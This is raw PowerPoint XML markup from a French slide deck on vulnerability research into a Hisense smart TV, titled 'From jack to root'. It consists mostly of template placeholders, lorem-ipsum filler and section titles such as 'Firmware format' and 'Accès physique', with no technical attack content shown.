            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26105172-9325-D643-82B4-51B2D10F8C11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3252508" y="1739714"/>
            <a:ext cx="2600325"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1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13" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47A7C41-CA0C-7D40-A28B-EB491EC3424F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166911" y="1739714"/>
            <a:ext cx="2600325" cy="2933691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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1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fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14"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11"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12" name="Espace réservé du texte 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97050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_texte_visue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1185" y="1739714"/>
            <a:ext cx="2600325" cy="2933691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82800" tIns="46800" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>NIVEAU 2 </a:t>
            </a:r>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nibh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>tincidunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>laoreet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>dolore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> magna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>aliquam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> erat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>. Ut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>wisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>tation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ullamcorper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lobortis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nisl</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eum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>iriure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>dolor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in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illum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>dolore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> eu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>iusto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>dignissim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> qui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>blandit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>praesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>luptatum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>zzril</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>delenit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>augue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> duis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>dolore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> te </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>feugait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>facilisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé pour une image  5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E25A8984-73F1-5646-8BE2-9C35ECA83EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370599" y="1739504"/>
            <a:ext cx="5408275" cy="2933700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquez sur l'icône pour ajouter une image</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D605C0A9-FD09-5F4C-A239-31E0CE29EBC0}"/>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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10"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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="761348"/>
            <a:ext cx="8147689" cy="441015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Espace réservé du texte 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638073" y="1209132"/>
            <a:ext cx="8140801" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de la page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Espace réservé du texte 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="200024"/>
            <a:ext cx="2217737" cy="250826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="180000" indent="-180000" algn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1100" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de partie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="397458"/>
            <a:ext cx="2217737" cy="250826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="180000" indent="-180000" algn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1000" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de partie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1218976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D605C0A9-FD09-5F4C-A239-31E0CE29EBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659381" y="4845571"/>
            <a:ext cx="514350" cy="304819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="750">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Espace réservé de la date 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7954634" y="4839891"/>
            <a:ext cx="920151" cy="310499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="750">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1387334373"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483700" r:id="rId1"/>
    <p:sldLayoutId id="2147483697" r:id="rId2"/>
    <p:sldLayoutId id="2147483705" r:id="rId3"/>
    <p:sldLayoutId id="2147483695" r:id="rId4"/>
    <p:sldLayoutId id="2147483704" r:id="rId5"/>
    <p:sldLayoutId id="2147483701" r:id="rId6"/>
    <p:sldLayoutId id="2147483696" r:id="rId7"/>
    <p:sldLayoutId id="2147483702" r:id="rId8"/>
    <p:sldLayoutId id="2147483669" r:id="rId9"/>
    <p:sldLayoutId id="2147483703" r:id="rId10"/>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122">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="3742">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" orient="horz" pos="1620">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" pos="234">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="16" orient="horz" pos="92">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="17" pos="5511">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="18" pos="499">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="19" pos="1995">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="20" pos="4263">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="21" pos="3691">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="22" pos="3878">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="23" pos="1872">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="24" pos="2132">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="25" pos="2041">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="26" orient="horz" pos="770">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="27" pos="621">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="28" orient="horz" pos="28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root-me.org/Tomtombinary" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tomtombinary.xyz/" TargetMode="Externa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webp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/tomtombinary" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tomtombinary" TargetMode="External"/><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netsparker.com/blog/web-security/hacking-smart-tv-command-injectio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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> jack to root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du numéro de diapositive 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Espace réservé du texte 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recherche de vulnérabilités sur une télévision </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hisense</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1066071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1BFC16-CF2C-83EC-8C78-F16511AB0B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961CE632-ECDA-3786-22D7-ED216CFF81FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB700A3-EA3C-ECF3-0783-86D99AFDD961}"/>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DC7CA9A3-90CB-5E00-D0BC-5D5B6354F40E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
